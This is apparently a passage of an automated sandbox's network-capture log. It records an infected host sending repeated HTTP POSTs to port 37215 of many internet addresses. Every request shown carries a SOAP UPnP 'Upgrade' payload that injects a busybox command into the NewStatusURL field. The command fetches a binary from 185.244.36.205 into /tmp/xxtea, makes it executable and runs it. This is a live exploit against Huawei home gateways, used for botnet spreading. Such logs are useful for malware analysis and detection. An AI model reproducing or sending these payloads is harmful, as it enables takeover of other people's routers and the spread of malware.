                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              681192.168.2.1545988197.70.122.22737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225048065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              682192.168.2.1537426190.21.87.6537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225079060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              683192.168.2.155236231.24.209.3237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225135088 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              684192.168.2.153867445.236.76.2037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225209951 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              685192.168.2.1542182158.40.192.18637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225210905 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              686192.168.2.155073841.199.59.5037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225212097 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              687192.168.2.1545650138.161.202.2437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225223064 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              688192.168.2.1539618102.143.127.10137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225275993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              689192.168.2.1538682156.240.201.16137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225322008 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              690192.168.2.1536978197.50.135.11637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225356102 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
